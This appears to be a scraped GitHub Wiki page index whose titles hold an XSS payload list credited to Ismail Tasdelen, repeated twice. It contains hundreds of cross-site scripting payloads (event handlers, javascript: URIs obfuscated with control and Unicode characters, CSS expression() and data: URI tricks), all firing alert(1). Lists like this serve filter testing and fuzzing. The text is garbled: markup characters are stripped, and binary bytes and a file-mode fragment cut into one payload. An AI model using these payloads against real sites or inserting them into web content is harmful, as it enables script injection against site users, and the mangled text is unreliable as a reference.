Page Index - motoyasu-saburi/sandbox GitHub Wiki

13 page(s) in this GitHub Wiki:

• [ ! Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload List ! Author : Ismail Tasdelen ! Linkedin : https: www.linkedin.com in ismailtasdelen ! GitHub : https: github.com ismailtasdelen ! Twitter : https: twitter.com ismailtsdln ! Medium : https: medium.com @ismailtasdelen script\x20type="text javascript" javascript:alert(1); script script\x3Etype="text javascript" javascript:alert(1); script script\x0Dtype="text javascript" javascript:alert(1); script script\x09type="text javascript" javascript:alert(1); script script\x0Ctype="text javascript" javascript:alert(1); script script\x2Ftype="text javascript" javascript:alert(1); script script\x0Atype="text javascript" javascript:alert(1); script '" \x3Cscript javascript:alert(1) script '" \x00script javascript:alert(1) script img src=1 href=1 onerror="javascript:alert(1)" img audio src=1 href=1 onerror="javascript:alert(1)" audio video src=1 href=1 onerror="javascript:alert(1)" video body src=1 href=1 onerror="javascript:alert(1)" body image src=1 href=1 onerror="javascript:alert(1)" image object src=1 href=1 onerror="javascript:alert(1)" object script src=1 href=1 onerror="javascript:alert(1)" script svg onResize svg onResize="javascript:javascript:alert(1)" svg onResize title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)" title onPropertyChange iframe onLoad iframe onLoad="javascript:javascript:alert(1)" iframe onLoad body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)" body onMouseEnter body onFocus body onFocus="javascript:javascript:alert(1)" body onFocus frameset onScroll frameset onScroll="javascript:javascript:alert(1)" frameset onScroll script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)" script onReadyStateChange html onMouseUp html onMouseUp="javascript:javascript:alert(1)" html onMouseUp body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)" body onPropertyChange svg onLoad svg onLoad="javascript:javascript:alert(1)" svg onLoad body onPageHide body onPageHide="javascript:javascript:alert(1)" body onPageHide body onMouseOver body onMouseOver="javascript:javascript:alert(1)" body onMouseOver body onUnload body onUnload="javascript:javascript:alert(1)" body onUnload body onLoad body onLoad="javascript:javascript:alert(1)" body onLoad bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)" bgsound onPropertyChange html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)" html onMouseLeave html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)" html onMouseWheel style onLoad style onLoad="javascript:javascript:alert(1)" style onLoad iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)" iframe onReadyStateChange body onPageShow body onPageShow="javascript:javascript:alert(1)" body onPageShow style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)" style onReadyStateChange frameset onFocus frameset onFocus="javascript:javascript:alert(1)" frameset onFocus applet onError applet onError="javascript:javascript:alert(1)" applet onError marquee onStart marquee onStart="javascript:javascript:alert(1)" marquee onStart script onLoad script onLoad="javascript:javascript:alert(1)" script onLoad html onMouseOver html onMouseOver="javascript:javascript:alert(1)" html onMouseOver html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)" html onMouseEnter body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)" body onBeforeUnload html onMouseDown html onMouseDown="javascript:javascript:alert(1)" html onMouseDown marquee onScroll marquee onScroll="javascript:javascript:alert(1)" marquee onScroll xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)" xml onPropertyChange frameset onBlur frameset onBlur="javascript:javascript:alert(1)" frameset onBlur applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)" applet onReadyStateChange svg onUnload svg onUnload="javascript:javascript:alert(1)" svg onUnload html onMouseOut html onMouseOut="javascript:javascript:alert(1)" html onMouseOut body onMouseMove body onMouseMove="javascript:javascript:alert(1)" body onMouseMove body onResize body onResize="javascript:javascript:alert(1)" body onResize object onError object onError="javascript:javascript:alert(1)" object onError body onPopState body onPopState="javascript:javascript:alert(1)" body onPopState html onMouseMove html onMouseMove="javascript:javascript:alert(1)" html onMouseMove applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)" applet onreadystatechange body onpagehide body onpagehide="javascript:javascript:alert(1)" body onpagehide svg onunload svg onunload="javascript:javascript:alert(1)" svg onunload applet onerror applet onerror="javascript:javascript:alert(1)" applet onerror body onkeyup body onkeyup="javascript:javascript:alert(1)" body onkeyup body onunload body onunload="javascript:javascript:alert(1)" body onunload iframe onload iframe onload="javascript:javascript:alert(1)" iframe onload body onload body onload="javascript:javascript:alert(1)" body onload html onmouseover html onmouseover="javascript:javascript:alert(1)" html onmouseover object onbeforeload object onbeforeload="javascript:javascript:alert(1)" object onbeforeload body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)" body onbeforeunload body onfocus body onfocus="javascript:javascript:alert(1)" body onfocus body onkeydown body onkeydown="javascript:javascript:alert(1)" body onkeydown iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)" iframe onbeforeload iframe src iframe src="javascript:javascript:alert(1)" iframe src svg onload svg onload="javascript:javascript:alert(1)" svg onload html onmousemove html onmousemove="javascript:javascript:alert(1)" html onmousemove body onblur body onblur="javascript:javascript:alert(1)" body onblur \x3Cscript javascript:alert(1) script '" script * *\x2Fjavascript:alert(1) * script script javascript:alert(1) script\x0D script javascript:alert(1) script\x0A script javascript:alert(1) script\x0B script charset="\x22 javascript:alert(1) script ! \x3E img src=xxx:x onerror=javascript:alert(1) ! img src=xxx:x onerror=javascript:alert(1) ! \x00 img src=xxx:x onerror=javascript:alert(1) ! \x21 img src=xxx:x onerror=javascript:alert(1) ! \x3E img src=xxx:x onerror=javascript:alert(1) "' img src='#\x27 onerror=javascript:alert(1) a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1" test a "' p svg script a='hello\x27;javascript:alert(1) '; script p a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1" test a script * *\x2A javascript:alert(1) * script script * *\x00 javascript:alert(1) * script style style\x3E img src="about:blank" onerror=javascript:alert(1) style style style\x0D img src="about:blank" onerror=javascript:alert(1) style style style\x09 img src="about:blank" onerror=javascript:alert(1) style style style\x20 img src="about:blank" onerror=javascript:alert(1) style style style\x0A img src="about:blank" onerror=javascript:alert(1) style "' ABC div style="font family:'foo'\x7Dx:expression(javascript:alert(1); ';" DEF "' ABC div style="font family:'foo'\x3Bx:expression(javascript:alert(1); *';" DEF script if("x\\xE1\x96\x89".length==2) { javascript:alert(1);} script script if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);} script script if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);} script '" \x3Cscript javascript:alert(1) script '" \x00script javascript:alert(1) script "' \x3Cimg src=xxx:x onerror=javascript:alert(1) "' \x00img src=xxx:x onerror=javascript:alert(1) script src="data:text plain\x2Cjavascript:alert(1)" script script src="data:\xD4\x8F,javascript:alert(1)" script script src="data:\xE0\xA4\x98,javascript:alert(1)" script script src="data:\xCB\x8F,javascript:alert(1)" script script\x20type="text javascript" javascript:alert(1); script script\x3Etype="text javascript" javascript:alert(1); script script\x0Dtype="text javascript" javascript:alert(1); script script\x09type="text javascript" javascript:alert(1); script script\x0Ctype="text javascript" javascript:alert(1); script script\x2Ftype="text javascript" javascript:alert(1); script script\x0Atype="text javascript" javascript:alert(1); script ABC div style="x\x3Aexpression(javascript:alert(1)" DEF ABC div style="x:expression\x5C(javascript:alert(1)" DEF ABC div style="x:expression\x00(javascript:alert(1)" DEF ABC div style="x:exp\x00ression(javascript:alert(1)" DEF ABC div style="x:exp\x5Cression(javascript:alert(1)" DEF ABC div style="x:\x0Aexpression(javascript:alert(1)" DEF ABC div style="x:\x09expression(javascript:alert(1)" DEF ABC div style="x:\xE3\x80\x80expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x84expression(javascript:alert(1)" DEF ABC div style="x:\xC2\xA0expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x80expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)" DEF ABC div style="x:\x0Dexpression(javascript:alert(1)" DEF ABC div style="x:\x0Cexpression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x87expression(javascript:alert(1)" DEF ABC div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)" DEF ABC div style="x:\x20expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x88expression(javascript:alert(1)" DEF ABC div style="x:\x00expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x86expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x85expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x82expression(javascript:alert(1)" DEF ABC div style="x:\x0Bexpression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x81expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x83expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x89expression(javascript:alert(1)" DEF a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x05javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x18javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x11javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x17javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x03javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1"DC������f���& ����100644 ! Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload List ! Author : Ismail Tasdelen ! Linkedin : https: www.linkedin.com in ismailtasdelen ! GitHub : https: github.com ismailtasdelen ! Twitter : https: twitter.com ismailtsdln ! Medium : https: medium.com @ismailtasdelen script\x20type="text javascript" javascript:alert(1); script script\x3Etype="text javascript" javascript:alert(1); script script\x0Dtype="text javascript" javascript:alert(1); script script\x09type="text javascript" javascript:alert(1); script script\x0Ctype="text javascript" javascript:alert(1); script script\x2Ftype="text javascript" javascript:alert(1); script script\x0Atype="text javascript" javascript:alert(1); script '" \x3Cscript javascript:alert(1) script '" \x00script javascript:alert(1) script img src=1 href=1 onerror="javascript:alert(1)" img audio src=1 href=1 onerror="javascript:alert(1)" audio video src=1 href=1 onerror="javascript:alert(1)" video body src=1 href=1 onerror="javascript:alert(1)" body image src=1 href=1 onerror="javascript:alert(1)" image object src=1 href=1 onerror="javascript:alert(1)" object script src=1 href=1 onerror="javascript:alert(1)" script svg onResize svg onResize="javascript:javascript:alert(1)" svg onResize title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)" title onPropertyChange iframe onLoad iframe onLoad="javascript:javascript:alert(1)" iframe onLoad body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)" body onMouseEnter body onFocus body onFocus="javascript:javascript:alert(1)" body onFocus frameset onScroll frameset onScroll="javascript:javascript:alert(1)" frameset onScroll script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)" script onReadyStateChange html onMouseUp html onMouseUp="javascript:javascript:alert(1)" html onMouseUp body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)" body onPropertyChange svg onLoad svg onLoad="javascript:javascript:alert(1)" svg onLoad body onPageHide body onPageHide="javascript:javascript:alert(1)" body onPageHide body onMouseOver body onMouseOver="javascript:javascript:alert(1)" body onMouseOver body onUnload body onUnload="javascript:javascript:alert(1)" body onUnload body onLoad body onLoad="javascript:javascript:alert(1)" body onLoad bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)" bgsound onPropertyChange html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)" html onMouseLeave html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)" html onMouseWheel style onLoad style onLoad="javascript:javascript:alert(1)" style onLoad iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)" iframe onReadyStateChange body onPageShow body onPageShow="javascript:javascript:alert(1)" body onPageShow style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)" style onReadyStateChange frameset onFocus frameset onFocus="javascript:javascript:alert(1)" frameset onFocus applet onError applet onError="javascript:javascript:alert(1)" applet onError marquee onStart marquee onStart="javascript:javascript:alert(1)" marquee onStart script onLoad script onLoad="javascript:javascript:alert(1)" script onLoad html onMouseOver html onMouseOver="javascript:javascript:alert(1)" html onMouseOver html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)" html onMouseEnter body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)" body onBeforeUnload html onMouseDown html onMouseDown="javascript:javascript:alert(1)" html onMouseDown marquee onScroll marquee onScroll="javascript:javascript:alert(1)" marquee onScroll xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)" xml onPropertyChange frameset onBlur frameset onBlur="javascript:javascript:alert(1)" frameset onBlur applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)" applet onReadyStateChange svg onUnload svg onUnload="javascript:javascript:alert(1)" svg onUnload html onMouseOut html onMouseOut="javascript:javascript:alert(1)" html onMouseOut body onMouseMove body onMouseMove="javascript:javascript:alert(1)" body onMouseMove body onResize body onResize="javascript:javascript:alert(1)" body onResize object onError object onError="javascript:javascript:alert(1)" object onError body onPopState body onPopState="javascript:javascript:alert(1)" body onPopState html onMouseMove html onMouseMove="javascript:javascript:alert(1)" html onMouseMove applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)" applet onreadystatechange body onpagehide body onpagehide="javascript:javascript:alert(1)" body onpagehide svg onunload svg onunload="javascript:javascript:alert(1)" svg onunload applet onerror applet onerror="javascript:javascript:alert(1)" applet onerror body onkeyup body onkeyup="javascript:javascript:alert(1)" body onkeyup body onunload body onunload="javascript:javascript:alert(1)" body onunload iframe onload iframe onload="javascript:javascript:alert(1)" iframe onload body onload body onload="javascript:javascript:alert(1)" body onload html onmouseover html onmouseover="javascript:javascript:alert(1)" html onmouseover object onbeforeload object onbeforeload="javascript:javascript:alert(1)" object onbeforeload body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)" body onbeforeunload body onfocus body onfocus="javascript:javascript:alert(1)" body onfocus body onkeydown body onkeydown="javascript:javascript:alert(1)" body onkeydown iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)" iframe onbeforeload iframe src iframe src="javascript:javascript:alert(1)" iframe src svg onload svg onload="javascript:javascript:alert(1)" svg onload html onmousemove html onmousemove="javascript:javascript:alert(1)" html onmousemove body onblur body onblur="javascript:javascript:alert(1)" body onblur \x3Cscript javascript:alert(1) script '" script * \x2Fjavascript:alert(1) * script script javascript:alert(1) script\x0D script javascript:alert(1) script\x0A script javascript:alert(1) script\x0B script charset="\x22 javascript:alert(1) script ! \x3E img src=xxx:x onerror=javascript:alert(1) ! img src=xxx:x onerror=javascript:alert(1) ! \x00 img src=xxx:x onerror=javascript:alert(1) ! \x21 img src=xxx:x onerror=javascript:alert(1) ! \x3E img src=xxx:x onerror=javascript:alert(1) "' img src='#\x27 onerror=javascript:alert(1) a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1" test a "' p svg script a='hello\x27;javascript:alert(1) '; script p a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1" test a a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1" test a script * \x2A javascript:alert(1) * script script * \x00 javascript:alert(1) * script style style\x3E img src="about:blank" onerror=javascript:alert(1) style style style\x0D img src="about:blank" onerror=javascript:alert(1) style style style\x09 img src="about:blank" onerror=javascript:alert(1) style style style\x20 img src="about:blank" onerror=javascript:alert(1) style style style\x0A img src="about:blank" onerror=javascript:alert(1) style "' ABC div style="font family:'foo'\x7Dx:expression(javascript:alert(1); *';" DEF "' ABC div style="font family:'foo'\x3Bx:expression(javascript:alert(1); ';" DEF script if("x\xE1\x96\x89".length==2) { javascript:alert(1);} script script if("x\xE0\xB9\x92".length==2) { javascript:alert(1);} script script if("x\xEE\xA9\x93".length==2) { javascript:alert(1);} script '" \x3Cscript javascript:alert(1) script '" \x00script javascript:alert(1) script "' \x3Cimg src=xxx:x onerror=javascript:alert(1) "' \x00img src=xxx:x onerror=javascript:alert(1) script src="data:text plain\x2Cjavascript:alert(1)" script script src="data:\xD4\x8F,javascript:alert(1)" script script src="data:\xE0\xA4\x98,javascript:alert(1)" script script src="data:\xCB\x8F,javascript:alert(1)" script script\x20type="text javascript" javascript:alert(1); script script\x3Etype="text javascript" javascript:alert(1); script script\x0Dtype="text javascript" javascript:alert(1); script script\x09type="text javascript" javascript:alert(1); script script\x0Ctype="text javascript" javascript:alert(1); script script\x2Ftype="text javascript" javascript:alert(1); script script\x0Atype="text javascript" javascript:alert(1); script ABC div style="x\x3Aexpression(javascript:alert(1)" DEF ABC div style="x:expression\x5C(javascript:alert(1)" DEF ABC div style="x:expression\x00(javascript:alert(1)" DEF ABC div style="x:exp\x00ression(javascript:alert(1)" DEF ABC div style="x:exp\x5Cression(javascript:alert(1)" DEF ABC div style="x:\x0Aexpression(javascript:alert(1)" DEF ABC div style="x:\x09expression(javascript:alert(1)" DEF ABC div style="x:\xE3\x80\x80expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x84expression(javascript:alert(1)" DEF ABC div style="x:\xC2\xA0expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x80expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)" DEF ABC div style="x:\x0Dexpression(javascript:alert(1)" DEF ABC div style="x:\x0Cexpression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x87expression(javascript:alert(1)" DEF ABC div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)" DEF ABC div style="x:\x20expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x88expression(javascript:alert(1)" DEF ABC div style="x:\x00expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x86expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x85expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x82expression(javascript:alert(1)" DEF ABC div style="x:\x0Bexpression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x81expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x83expression(javascript:alert(1)" DEF ABC div style="x:\xE2\x80\x89expression(javascript:alert(1)" DEF a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x05javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x18javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x11javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x17javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x03javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x00javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x10javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x20javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x13javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x09javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x14javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x19javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x07javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x04javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x01javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x08javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x12javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x15javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x16javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x02javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x06javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1" test a a href="javascript\x00:javascript:alert(1)" id="fuzzelement1" test a a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1" test a a href="javascript\x09:javascript:alert(1)" id="fuzzelement1" test a a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1" test a a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1" test a "' img src=xxx:x \x0Aonerror=javascript:alert(1) "' img src=xxx:x \x22onerror=javascript:alert(1) "' img src=xxx:x \x0Bonerror=javascript:alert(1) "' img src=xxx:x \x0Donerror=javascript:alert(1) "' img src=xxx:x \x2Fonerror=javascript:alert(1) "' img src=xxx:x \x09onerror=javascript:alert(1) "' img src=xxx:x \x0Conerror=javascript:alert(1) "' img src=xxx:x \x00onerror=javascript:alert(1) "' img src=xxx:x \x27onerror=javascript:alert(1) "' img src=xxx:x \x20onerror=javascript:alert(1) "' script \x3Bjavascript:alert(1) script "' script \x0Djavascript:alert(1) script "' script \xEF\xBB\xBFjavascript:alert(1) script "' script \xE2\x80\x81javascript:alert(1) script "' script \xE2\x80\x84javascript:alert(1) script "' script \xE3\x80\x80javascript:alert(1) script "' script \x09javascript:alert(1) script "' script \xE2\x80\x89javascript:alert(1) script "' script \xE2\x80\x85javascript:alert(1) script "' script \xE2\x80\x88javascript:alert(1) script "' script \x00javascript:alert(1) script "' script \xE2\x80\xA8javascript:alert(1) script "' script \xE2\x80\x8Ajavascript:alert(1) script "' script \xE1\x9A\x80javascript:alert(1) script "' script \x0Cjavascript:alert(1) script "' script \x2Bjavascript:alert(1) script "' script \xF0\x90\x96\x9Ajavascript:alert(1) script "' script javascript:alert(1) script "' script \x0Ajavascript:alert(1) script "' script \xE2\x80\xAFjavascript:alert(1) script "' script \x7Ejavascript:alert(1) script "' script \xE2\x80\x87javascript:alert(1) script "' script \xE2\x81\x9Fjavascript:alert(1) script "' script \xE2\x80\xA9javascript:alert(1) script "' script \xC2\x85javascript:alert(1) script "' script \xEF\xBF\xAEjavascript:alert(1) script "' script \xE2\x80\x83javascript:alert(1) script "' script \xE2\x80\x8Bjavascript:alert(1) script "' script \xEF\xBF\xBEjavascript:alert(1) script "' script \xE2\x80\x80javascript:alert(1) script "' script \x21javascript:alert(1) script "' script \xE2\x80\x82javascript:alert(1) script "' script \xE2\x80\x86javascript:alert(1) script "' script \xE1\xA0\x8Ejavascript:alert(1) script "' script \x0Bjavascript:alert(1) script "' script \x20javascript:alert(1) script "' script \xC2\xA0javascript:alert(1) script " img onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x " img onerror=\x22javascript:alert(1)\x22src=xxx:x " img onerror=\x09javascript:alert(1)\x09src=xxx:x " img onerror=\x27javascript:alert(1)\x27src=xxx:x " img onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x " img onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x " img onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x " img onerror=\x60javascript:alert(1)\x60src=xxx:x " img onerror=\x20javascript:alert(1)\x20src=xxx:x script\x2F javascript:alert(1) script script\x20 javascript:alert(1) script script\x0D javascript:alert(1) script script\x0A javascript:alert(1) script script\x0C javascript:alert(1) script script\x00 javascript:alert(1) script script\x09 javascript:alert(1) script "' img src=xxx:x onerror\x0B=javascript:alert(1) "' img src=xxx:x onerror\x00=javascript:alert(1) "' img src=xxx:x onerror\x0C=javascript:alert(1) "' img src=xxx:x onerror\x0D=javascript:alert(1) "' img src=xxx:x onerror\x20=javascript:alert(1) "' img src=xxx:x onerror\x0A=javascript:alert(1) "' img src=xxx:x onerror\x09=javascript:alert(1) script javascript:alert(1) \x00 script img src=# onerror\x3D"javascript:alert(1)" input onfocus=javascript:alert(1) autofocus input onblur=javascript:alert(1) autofocus input autofocus video poster=javascript:javascript:alert(1) body onscroll=javascript:alert(1) br br br br br br ... br br br br br br br br br br ... br br br br br br br br br br ... br br br br br br br br br br ... br br br br br br br br br br ... br br br br input autofocus form id=test onforminput=javascript:alert(1) input form button form=test onformchange=javascript:alert(1) X video source onerror="javascript:javascript:alert(1)" video onerror="javascript:javascript:alert(1)" source form button formaction="javascript:javascript:alert(1)" X body oninput=javascript:alert(1) input autofocus math href="javascript:javascript:alert(1)" CLICKME math math maction actiontype="statusline#http: google.com" xlink:href="javascript:javascript:alert(1)" CLICKME maction math frameset onload=javascript:alert(1) table background="javascript:javascript:alert(1)" ! img src=" img src=x onerror=javascript:alert(1) " comment img src=" comment img src=x onerror=javascript:alert(1)) " ![ img src="] img src=x onerror=javascript:alert(1) " style img src=" style img src=x onerror=javascript:alert(1) " li style=list style:url() onerror=javascript:alert(1) div style=content:url(data:image svg xml,%%3Csvg %%3E);visibility:hidden onload=javascript:alert(1) div head base href="javascript: " head body a href=" . ,javascript:alert(1) #" XXX a body SCRIPT FOR=document EVENT=onreadystatechange javascript:alert(1) SCRIPT OBJECT CLASSID="clsid:333C7BC4 460F 11D0 BC04 0080C7055A83" PARAM NAME="DataURL" VALUE="javascript:alert(1)" OBJECT object data="data:text html;base64,%(base64)s" embed src="data:text html;base64,%(base64)s" b script alert(1) script 0 div id="div1" input value="onmouseover=javascript:alert(1)" div div id="div2" div script document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML; script x '="foo" x foo=' img src=x onerror=javascript:alert(1) ' embed src="javascript:alert(1)" img src="javascript:alert(1)" image src="javascript:alert(1)" script src="javascript:alert(1)" div style=width:1px;filter:glow onfilterchange=javascript:alert(1) x ? foo=" script javascript:alert(1) script " ! foo=" script javascript:alert(1) script " foo=" script javascript:alert(1) script " ? foo=" x foo='? script javascript:alert(1) script ' " ! foo="[[Inception]]" x foo="]foo script javascript:alert(1) script " % foo x foo="% script javascript:alert(1) script " div 